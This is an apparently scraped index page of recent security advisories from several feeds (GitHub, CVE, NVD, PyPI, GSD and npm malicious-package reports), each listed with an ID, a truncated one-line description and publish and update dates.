Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-jf9v-fxfq-wm76 Lift Sensitive Information Disclosure 2022-05-17T05:07:19Z 2025-09-30T19:18:03Z
ghsa-ww3v-6xjf-jv28 Uncontrolled Resource Consumption in Spray JSON 2022-06-28T23:23:20Z 2025-09-30T19:11:48Z
ghsa-55vq-xpjf-r2xc Lightbend Alpakka Kafka logs credentials on debug level 2023-04-27T21:30:26Z 2025-09-30T18:53:16Z
ghsa-gpx4-37g2-c8pv Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook 2025-09-30T18:32:31Z 2025-09-30T18:32:31Z
ghsa-x5c4-2c4m-rfj5 Rapid7 AppSpider Pro versions below 7.5.021 suffer from a project name validation vulnerability, wh… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-x284-mqwh-m8wm Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component contro… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-wr4m-f8q9-97q2 NiceHash QuickMiner 6.12.0 perform software updates over HTTP without validating digital signatures… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-jwvx-8mrf-4v7m The EKEN video doorbell T6 BT60PLUS_MAIN_V1.0_GC1084_20230531 periodically sends debug logs to the … 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-j4g5-gmc2-6cfx An SQL injection vulnerability in user-login.php and index.php of Karthikg1908 Hospital Management … 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-g829-2387-h324 A flaw was found in Red Hat Openshift AI Service. A low-privileged attacker with access to an authe… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-cv3h-v6fc-4549 NVIDIA Delegated Licensing Service for all appliance platforms contains a SQL injection vulnerabili… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-cphw-5rrj-wrrh NVIDIA Delegated Licensing Service for all appliance platforms contains a vulnerability where an Us… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-9965-vmph-33xx A URL validation bypass vulnerability exists in validator.js through version 13.15.15. The isURL() … 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-83v7-hfmf-x8c4 NVIDIA Delegated Licensing Service for all appliance platforms contains a vulnerability where an Us… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-6339-mv7f-5fgx SourceCodester Web-based Pharmacy Product Management System V1.0 is vulnerable to Cross Site Script… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-5xqv-9pr8-p6mp A security flaw in the '_transfer' function of a smart contract implementation for Money Making Opp… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-5xq5-7xh5-4jv6 There is a memory corruption vulnerability due to an out of bounds read in DefaultFontOptions() whe… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-whc9-qqp7-r44w There is a memory corruption vulnerability due to an out of bounds write in XML_Serialize() when us… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-vm59-52f9-r52r A privilege escalation flaw from host to domain administrator was found in FreeIPA. This vulnerabil… 2025-09-30T15:30:30Z 2025-09-30T18:30:24Z
ghsa-vgh5-4jjp-4pmh TitanSystems Zender v3.9.7 contains an account takeover vulnerability in its password reset functio… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-ph37-2cqr-gfc5 Improper handling of authentication requests lead to a user enumeration vector in the passkey authe… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-fm22-g2q9-j3pw Improper handling of input could lead to an XSS vector in the checkAttribute method of the input fi… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-f8r4-mf27-rf7m Finance.js v4.1.0 contains a Denial of Service (DoS) vulnerability via the IRR function’s depth par… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-6cwx-42hw-w69c An improper access control vulnerability in FormCms v0.5.4 in the /api/schemas/history/[schemaId] e… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-5q7q-p8pc-782h An issue in finance.js v.4.1.0 allows a remote attacker to cause a denial of service via the seekZe… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-qf47-cq5r-x3c3 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-02-25T15:34:37Z 2025-09-30T18:30:21Z
ghsa-5gjj-p5jq-f47g Path Traversal vulnerability in CodeManas Search with Typesense allows Path Traversal. This issue a… 2025-02-25T15:34:37Z 2025-09-30T18:30:21Z
ghsa-m99q-jrwg-59cj The Treck TCP/IP stack before 6.0.1.66 has an IPv4 Integer Underflow. 2022-05-24T17:20:44Z 2025-09-30T18:30:19Z
ghsa-8cmf-w78x-mr9c An issue was discovered in Treck IPv6 before 6.0.1.68. Improper Input Validation in the IPv6 compon… 2022-05-24T17:37:05Z 2025-09-30T18:30:19Z
ghsa-85jh-9232-5897 The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to Cross-Site R… 2024-04-09T21:31:59Z 2025-09-30T18:30:19Z
ID CVSS Description Vendor Product Published Updated
cve-2025-56392 N/A An Insecure Direct Object Reference (IDOR) in the… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:49:16.527Z
cve-2025-56018 N/A SourceCodester Web-based Pharmacy Product Managem… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:48:16.760Z
cve-2025-58008 6.5 (v3.1) WordPress Participants Database Plugin <= 2.7.6.3 - Cr… xnau webdesign Participants Database 2025-09-22T18:24:10.219Z 2025-09-30T19:45:00.138Z
cve-2025-52047 N/A In Frappe ErpNext v15.57.5, the function get_inco… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:43:47.741Z
cve-2025-52043 N/A In Frappe ERPNext v15.57.5, the function import_c… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:42:37.445Z
cve-2025-36262 4.9 (v3.1) IBM Planning Analytics Local information disclosure IBM Planning Analytics Local 2025-09-30T19:42:37.033Z 2025-09-30T19:42:37.033Z
cve-2025-52050 N/A In Frappe ERPNext 15.57.5, the function get_loyal… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:41:37.443Z
cve-2025-36132 5.4 (v3.1) IBM Planning Analytics Local cross-site scripting IBM Planning Analytics Local 2025-09-30T19:41:19.912Z 2025-09-30T19:41:19.912Z
cve-2025-52049 N/A In Frappe ErpNext v15.57.5, the function get_time… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:37:58.497Z
cve-2025-56200 N/A A URL validation bypass vulnerability exists in v… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:36:11.737Z
cve-2025-56675 The EKEN video doorbell T6 BT60PLUS_MAIN_V1.0_GC1… EKEN video doorbell T6 2025-09-30T00:00:00.000Z 2025-09-30T19:32:42.572Z
cve-2025-9230 Out-of-bounds read & write in RFC 3211 KEK Unwrap OpenSSL OpenSSL 2025-09-30T13:17:00.808Z 2025-09-30T19:30:29.803Z
cve-2025-28016 N/A A Reflected Cross-Site Scripting (XSS) vulnerabil… n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:29:13.883Z
cve-2025-9231 Timing side-channel in SM2 algorithm on 64 bit ARM OpenSSL OpenSSL 2025-09-30T13:17:12.007Z 2025-09-30T19:28:28.380Z
cve-2024-55017 N/A Account Takeover in Corezoid 6.6.0 in the OAuth2 … n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T19:27:55.072Z
cve-2025-41095 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:15:55.509Z 2025-09-30T19:25:16.750Z
cve-2025-41096 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:16:31.984Z 2025-09-30T19:24:49.948Z
cve-2025-41094 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:14:33.108Z 2025-09-30T19:24:40.970Z
cve-2025-41097 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:16:55.358Z 2025-09-30T19:24:28.801Z
cve-2025-41099 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:17:30.044Z 2025-09-30T19:24:03.057Z
cve-2025-41098 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:18:20.965Z 2025-09-30T19:23:33.563Z
cve-2025-41093 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:13:48.555Z 2025-09-30T19:22:52.080Z
cve-2025-9232 Out-of-bounds read in HTTP client no_proxy handling OpenSSL OpenSSL 2025-09-30T13:17:19.172Z 2025-09-30T19:22:35.483Z
cve-2025-41092 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:12:59.221Z 2025-09-30T19:21:12.468Z
cve-2025-41091 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS) BOLD Workplanner 2025-09-30T11:10:49.088Z 2025-09-30T19:18:22.090Z
cve-2025-8122 8.7 (v4.0) Blind SQL Injection in PAD CMS Polska Akademia Dostępności PAD CMS 2025-09-30T10:05:21.046Z 2025-09-30T19:16:36.187Z
cve-2025-8121 8.7 (v4.0) Blind SQL Injection in PAD CMS Polska Akademia Dostępności PAD CMS 2025-09-30T10:05:13.295Z 2025-09-30T19:15:53.681Z
cve-2025-8120 10 (v4.0) Remote Code Execution via Unrestricted File Upload in … Polska Akademia Dostępności PAD CMS 2025-09-30T10:05:03.496Z 2025-09-30T19:15:27.470Z
cve-2025-8119 5.1 (v4.0) Cross-Site Request Forgery in PAD CMS Polska Akademia Dostępności PAD CMS 2025-09-30T10:04:54.900Z 2025-09-30T19:14:50.548Z
cve-2025-8118 6.9 (v4.0) Bruteforce Protection Bypass in PAD CMS Polska Akademia Dostępności PAD CMS 2025-09-30T10:04:46.284Z 2025-09-30T19:14:22.705Z
ID CVSS Description Vendor Product Published Updated
cve-2025-25968 N/A DDSN Interactive cm3 Acora CMS version 10.1.1 con… n/a n/a 2025-02-20T00:00:00.000Z 2025-02-20T19:43:14.160Z
cve-2025-47790 Nextcloud Server doesn't request second factor after s… nextcloud security-advisories 2025-05-16T14:02:57.806Z 2025-05-16T14:51:08.989Z
cve-2025-47794 Nextcloud Server vulnerable to insecure temporary file… nextcloud security-advisories 2025-05-16T14:35:25.280Z 2025-05-16T14:48:34.016Z
cve-2025-27566 3.8 (v3.1) 5.1 (v4.0) Path traversal vulnerability exists in a-blog cms… appleple inc. a-blog cms 2025-05-19T08:09:26.427Z 2025-05-19T14:42:50.286Z
cve-2025-32999 5.4 (v3.1) 4.8 (v4.0) Cross-site scripting vulnerability exists in a-bl… appleple inc. a-blog cms 2025-05-19T08:08:51.815Z 2025-05-19T15:28:40.444Z
cve-2025-56132 N/A LiquidFiles filetransfer server is vulnerable to … n/a n/a 2025-09-30T00:00:00.000Z 2025-09-30T18:49:21.225Z
cve-2025-43827 5.3 (v4.0) Insecure Direct Object Reference (IDOR) vulnerabi… Liferay Portal 2025-09-30T18:57:54.351Z 2025-09-30T18:57:54.351Z
cve-2025-11149 This affects all versions of the package node-sta… n/a node-static 2025-09-30T05:00:07.700Z 2025-09-30T19:07:09.035Z
cve-2025-11148 All versions of the package check-branches are vu… n/a check-branches 2025-09-30T05:00:06.332Z 2025-09-30T19:06:21.373Z
cve-2024-1297 10 (v3.1) Loomio 2.22.0 - Code injection Loomio Loomio 2024-02-19T23:41:47.207Z 2025-09-30T19:10:07.621Z
cve-2025-36560 8.6 (v3.1) 9.2 (v4.0) Server-side request forgery vulnerability exists … appleple inc. a-blog cms 2025-05-19T08:08:00.732Z 2025-05-19T15:45:37.691Z
cve-2021-45688 N/A An issue was discovered in the ash crate before 0… n/a n/a 2021-12-26T21:51:47 2024-08-04T04:47:02.011Z
cve-2025-41429 4.8 (v3.1) 2.1 (v4.0) a-blog cms multiple versions neutralize logs impr… appleple inc. a-blog cms 2025-05-19T08:07:38.068Z 2025-05-19T15:46:29.408Z
cve-2024-41476 N/A AMTT Hotel Broadband Operation System (HiBOS) V3.… n/a n/a 2024-08-09T00:00:00 2024-08-10T14:37:22.044Z
cve-2025-47850 4.3 (v3.1) In JetBrains YouTrack before 2025.1.74704 restric… JetBrains YouTrack 2025-05-20T17:37:43.234Z 2025-05-20T17:51:14.017Z
cve-2025-1716 5.3 (v4.0) picklescan - Security scanning bypass via 'pip main' mmaitre314 picklescan 2025-02-26T14:51:38.085Z 2025-03-03T15:58:37.163Z
cve-2025-48391 7.7 (v3.1) In JetBrains YouTrack before 2025.1.76253 deletio… JetBrains YouTrack 2025-05-20T17:37:42.265Z 2025-05-20T17:51:27.480Z
cve-2022-28224 Calico and Calico Enterprise may be vulnerable to rout… Tigera Calico Enterprise 2022-06-06T17:19:12.810566Z 2024-09-16T20:31:41.256Z
cve-2025-6276 Brilliance Golden Link Secondary System rentTakeInfoPa… Brilliance Golden Link Secondary System 2025-06-19T20:00:12.445Z 2025-06-23T19:30:21.538Z
cve-2025-6277 Brilliance Golden Link Secondary System custTakeInfoPa… Brilliance Golden Link Secondary System 2025-06-19T20:29:32.333Z 2025-06-23T19:30:16.622Z
cve-2025-55230 7.8 (v3.1) Windows MBT Transport Driver Elevation of Privilege Vu… Microsoft Windows 10 Version 1809 2025-08-21T19:49:44.447Z 2025-09-17T17:52:11.374Z
cve-2025-6282 xlang-ai OpenAgents file.py create_upload_file path tr… xlang-ai OpenAgents 2025-06-19T22:00:16.250Z 2025-06-23T19:29:48.205Z
cve-2025-55229 5.3 (v3.1) Windows Certificate Spoofing Vulnerability Microsoft Windows 10 Version 1809 2025-08-21T19:50:40.421Z 2025-09-17T17:53:04.856Z
cve-2024-35591 N/A An arbitrary file upload vulnerability in O2OA v8… n/a n/a 2024-05-24T13:50:27.504Z 2025-02-13T15:59:06.165Z
cve-2025-6283 xataio Xata Agent route.ts GET path traversal xataio Xata Agent 2025-06-19T22:31:07.828Z 2025-06-23T19:29:42.982Z
cve-2025-6365 HobbesOSR Kitten pgtable.h set_pte_at resource consumption HobbesOSR Kitten 2025-06-20T20:31:06.583Z 2025-06-23T15:18:08.528Z
cve-2025-6498 HTACG tidy-html5 alloc.c defaultAlloc memory leak HTACG tidy-html5 2025-06-23T01:31:05.868Z 2025-06-23T13:45:07.073Z
cve-2025-6517 Dromara MaxKey Meta URL SAML20DetailsController.java a… Dromara MaxKey 2025-06-23T18:00:15.580Z 2025-06-24T13:33:50.343Z
cve-2024-4665 N/A EventPrime – Events Calendar, Bookings and Tickets < 3… Unknown EventPrime 2025-05-15T20:09:45.830Z 2025-08-27T12:00:22.935Z
cve-2024-8983 N/A Custom Twitter Feeds < 2.2.3 - Admin+ Stored XSS Unknown Custom Twitter Feeds 2024-10-08T06:00:03.744Z 2025-08-27T12:00:59.283Z
ID Description Published Updated
fkie_cve-2024-36911 In the Linux kernel, the following vulnerability has been resolved: hv_netvsc: Don't free decrypte… 2024-05-30T16:15:14.530 2025-09-30T17:57:44.780
fkie_cve-2024-2165 The SEOPress – On-site SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via th… 2024-04-09T19:15:28.763 2025-09-30T17:56:44.110
fkie_cve-2024-2822 A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. This affects an unk… 2024-03-22T17:15:09.093 2025-09-30T17:54:47.697
fkie_cve-2024-36909 In the Linux kernel, the following vulnerability has been resolved: Drivers: hv: vmbus: Don't free… 2024-05-30T16:15:14.380 2025-09-30T17:54:32.430
fkie_cve-2024-41349 unmark 1.9.2 is vulnerable to Cross Site Scripting (XSS) via application/views/marks/add_by_url.php. 2024-08-29T21:15:10.433 2025-09-30T17:52:57.667
fkie_cve-2025-43375 The issue was addressed with improved checks. This issue is fixed in Xcode 26. Processing an overly… 2025-09-15T23:15:39.013 2025-09-30T17:52:42.230
fkie_cve-2024-36908 In the Linux kernel, the following vulnerability has been resolved: blk-iocost: do not WARN if ioc… 2024-05-30T16:15:14.300 2025-09-30T17:51:14.207
fkie_cve-2024-36900 In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix kernel crash wh… 2024-05-30T16:15:13.600 2025-09-30T17:49:17.863
fkie_cve-2024-36880 In the Linux kernel, the following vulnerability has been resolved: Bluetooth: qca: add missing fi… 2024-05-30T16:15:11.640 2025-09-30T17:46:25.843
fkie_cve-2024-36029 In the Linux kernel, the following vulnerability has been resolved: mmc: sdhci-msm: pervent access… 2024-05-30T16:15:11.247 2025-09-30T17:43:52.073
fkie_cve-2024-36026 In the Linux kernel, the following vulnerability has been resolved: drm/amd/pm: fixes a random han… 2024-05-30T15:15:49.577 2025-09-30T17:41:33.853
fkie_cve-2024-36024 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Disable idle … 2024-05-30T15:15:49.420 2025-09-30T17:39:31.130
fkie_cve-2024-36021 In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix kernel crash wh… 2024-05-30T15:15:49.193 2025-09-30T17:20:03.930
fkie_cve-2025-7493 A privilege escalation flaw from host to domain administrator was found in FreeIPA. This vulnerabil… 2025-09-30T15:15:58.243 2025-09-30T17:15:41.637
fkie_cve-2025-56520 Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component contro… 2025-09-30T17:15:41.333 2025-09-30T17:15:41.333
fkie_cve-2025-56207 A security flaw in the '_transfer' function of a smart contract implementation for Money Making Opp… 2025-09-30T17:15:41.163 2025-09-30T17:15:41.163
fkie_cve-2024-36018 In the Linux kernel, the following vulnerability has been resolved: nouveau/uvmm: fix addr/range c… 2024-05-30T15:15:48.950 2025-09-30T17:15:40.997
fkie_cve-2025-54476 Improper handling of input could lead to an XSS vector in the checkAttribute method of the input fi… 2025-09-30T16:15:52.280 2025-09-30T17:15:40.927
fkie_cve-2025-20352 A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software an… 2025-09-24T18:15:36.930 2025-09-30T17:15:37.663
fkie_cve-2025-43400 An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in ma… 2025-09-29T18:15:31.620 2025-09-30T17:12:46.563
fkie_cve-2024-10241 Mattermost versions 9.5.x <= 9.5.9 fail to properly filter the channel data when ElasticSearch is e… 2024-10-29T08:15:11.990 2025-09-30T17:09:36.340
fkie_cve-2025-23798 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-01-22T15:15:23.873 2025-09-30T17:05:49.347
fkie_cve-2025-26876 Path Traversal vulnerability in CodeManas Search with Typesense allows Path Traversal. This issue a… 2025-02-25T15:15:24.180 2025-09-30T17:05:26.237
fkie_cve-2025-26877 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-02-25T15:15:24.380 2025-09-30T17:03:49.237
fkie_cve-2025-28168 The Multiple File Upload add-on component 3.1.0 for OutSystems is vulnerable to Unrestricted File U… 2025-05-05T14:15:28.500 2025-09-30T17:01:40.920
fkie_cve-2025-29088 In SQLite 3.49.0 before 3.49.1, certain argument values to sqlite3_db_config (in the C-language API… 2025-04-10T14:15:27.163 2025-09-30T16:59:27.320
fkie_cve-2024-1587 The Newsmatic theme for WordPress is vulnerable to Sensitive Information Exposure in all versions u… 2024-04-09T19:15:18.580 2025-09-30T16:57:37.430
fkie_cve-2024-1714 An issue exists in all supported versions of IdentityIQ Lifecycle Manager that can result if an ent… 2024-02-21T17:15:09.003 2025-09-30T16:56:44.690
fkie_cve-2024-20332 A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could… 2024-04-03T17:15:48.713 2025-09-30T16:53:58.543
fkie_cve-2024-20345 A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an aut… 2024-03-06T17:15:09.973 2025-09-30T16:53:00.220
ID Description Package Published Updated
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1… mindsdb 2023-12-11T21:15:00Z 2025-09-24T12:25:35.630454Z
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:55.139467Z
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:55.008375Z
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:54.875042Z
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:54.738725Z
pysec-2025-52 gateway_proxy_handler in MLflow before 3.1.0 lacks gateway_path validation. mlflow 2025-06-23T15:15:29Z 2025-08-28T06:24:53.410404Z
pysec-2025-72 The `num2words` project was compromised via a phishing attack and two new versions were u… num2words 2025-07-31T14:34:47+00:00
pysec-2025-71 Cadwyn creates production-ready community-driven modern Stripe-like API versioning in Fas… cadwyn 2025-07-21T21:15:25+00:00 2025-07-23T15:24:03.825615+00:00
pysec-2025-70 A Server-Side Request Forgery (SSRF) vulnerability exists in the RequestsToolkit componen… langchain-community 2025-06-23T21:15:25+00:00 2025-07-16T21:23:40.211079+00:00
pysec-2024-259 In PyTorch <=2.4.1, the RemoteModule has Deserialization RCE. NOTE: this is disputed by m… torch 2024-10-29T21:15:04+00:00 2025-07-16T03:09:57.748865+00:00
pysec-2024-258 In scrapy/scrapy, an issue was identified where the Authorization header is not removed d… scrapy 2024-05-20T08:15:08+00:00 2025-07-15T17:37:50.051730+00:00
pysec-2025-69 In Roundup before 2.5.0, XSS can occur via interaction between URLs and issue tracker tem… roundup 2025-07-13T20:15:25+00:00 2025-07-13T21:23:01.161315+00:00
pysec-2025-68 A vulnerability, which was classified as critical, has been found in Upsonic up to 0.55.6… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.449399+00:00
pysec-2025-67 A vulnerability classified as critical was found in Upsonic up to 0.55.6. This vulnerabil… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.385619+00:00
pysec-2025-66 Improper privilege management in a REST interface allowed registered users to access unau… streampipes 2025-03-03T11:15:11+00:00 2025-07-08T15:23:46.628375+00:00
pysec-2025-65 A path traversal vulnerability exists in run-llama/llama_index versions 0.12.27 through 0… llama-index 2025-07-07T13:15:28+00:00 2025-07-07T15:23:42.730681+00:00
pysec-2025-61 Pillow is a Python imaging library. In versions 11.2.0 to before 11.3.0, there is a heap … pillow 2025-07-01T19:15:27Z 2025-07-07T14:12:46.226030Z
pysec-2025-64 A vulnerability classified as critical has been found in themanojdesai python-a2a up to 0… python-a2a 2025-06-17T07:15:18+00:00 2025-07-02T21:23:13.806273+00:00
pysec-2025-63 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Whe… vllm 2025-03-19T16:15:32+00:00 2025-07-01T23:22:49.176005+00:00
pysec-2025-62 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Mal… vllm 2025-02-07T20:15:34+00:00 2025-07-01T23:22:49.083695+00:00
pysec-2025-60 Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Inform… apache-iotdb 2025-05-14T11:16:28+00:00 2025-07-01T21:22:47.232036+00:00
pysec-2025-59 Remote Code Execution with untrusted URI of UDF vulnerability in Apache IoTDB. The attack… apache-iotdb 2025-05-14T11:15:47+00:00 2025-07-01T21:22:47.177405+00:00
pysec-2024-257 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-03-22T23:15:07+00:00 2025-06-30T15:23:50.085549+00:00
pysec-2025-58 vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py impl… vllm 2025-01-27T18:15:41+00:00 2025-06-27T21:22:36.583615+00:00
pysec-2025-57 A Denial of Service (DoS) vulnerability in zenml-io/zenml version 0.66.0 allows unauthent… zenml 2025-03-20T10:15:48+00:00 2025-06-27T17:22:55.175431+00:00
pysec-2025-56 OctoPrint provides a web interface for controlling consumer 3D printers. In versions up t… octoprint 2025-04-22T18:15:59+00:00 2025-06-27T17:22:53.513680+00:00
pysec-2024-256 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-12-03T16:15:24+00:00 2025-06-27T17:22:53.325430+00:00
pysec-2025-55 vLLM is an inference and serving engine for large language models (LLMs). Version 0.8.0 u… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.407481+00:00
pysec-2025-54 vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.319321+00:00
pysec-2025-53 vLLM is an inference and serving engine for large language models (LLMs). Prior to versio… vllm 2025-05-29T17:15:21+00:00 2025-06-26T21:23:06.231251+00:00
ID Description
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876 The format of the source doesn't require a description, click on the link for more details
ID Description Published Updated
mal-2024-11205 Malicious code in @wix-platform/velo-multilingual-helper-backend (npm) 2024-12-05T12:37:46Z 2024-12-05T12:37:46Z
mal-2024-11204 Malicious code in cdp-agentkit-core (npm) 2024-12-05T10:35:51Z 2024-12-05T10:35:51Z
mal-2024-7895 Malicious code in lit-3 (npm) 2024-08-05T18:53:26Z 2024-12-05T09:06:36Z
mal-2024-11203 Malicious code in finn-pulse-init (npm) 2024-12-05T07:58:04Z 2024-12-05T08:07:42Z
mal-2024-11202 Malicious code in buoyant-utils (npm) 2024-12-05T05:57:35Z 2024-12-05T05:57:35Z
mal-2024-11201 Malicious code in coldbox (npm) 2024-12-05T04:54:20Z 2024-12-05T05:06:49Z
mal-2024-11200 Malicious code in quintoandar-jwt (npm) 2024-12-05T00:55:28Z 2024-12-05T00:55:28Z
mal-2024-10914 Malicious code in veworld-mock (npm) 2024-11-24T20:43:19Z 2024-12-05T00:35:15Z
mal-2024-10912 Malicious code in quorumnetworktester (npm) 2024-11-24T18:53:52Z 2024-12-05T00:35:15Z
mal-2024-10911 Malicious code in plaid-tiny-quickstart (npm) 2024-11-24T16:15:48Z 2024-12-05T00:35:15Z
mal-2024-10572 Malicious code in xcasset-gen (npm) 2024-11-08T12:05:36Z 2024-12-05T00:35:15Z
mal-2024-10570 Malicious code in spliffy-benchmark (npm) 2024-11-08T13:58:58Z 2024-12-05T00:35:15Z
mal-2024-10569 Malicious code in quill-icons-park (npm) 2024-11-08T12:25:57Z 2024-12-05T00:35:15Z
mal-2024-10566 Malicious code in pixiv-novel-editor (npm) 2024-11-08T12:13:43Z 2024-12-05T00:35:15Z
mal-2024-10534 Malicious code in sinbad-dev (npm) 2024-11-08T11:45:22Z 2024-12-05T00:35:15Z
mal-2024-2055 Malicious code in d11-foo (npm) 2024-06-25T12:35:11Z 2024-12-05T00:35:14Z
mal-2024-11183 Malicious code in @solana/web3.js (npm) 2024-12-03T22:45:37Z 2024-12-05T00:35:14Z
mal-2024-10909 Malicious code in lunar-root (npm) 2024-11-24T23:02:20Z 2024-12-05T00:35:14Z
mal-2024-10908 Malicious code in jigasi-haproxy-agent (npm) 2024-11-24T18:18:29Z 2024-12-05T00:35:14Z
mal-2024-10907 Malicious code in generate-release-description (npm) 2024-11-24T22:43:11Z 2024-12-05T00:35:14Z
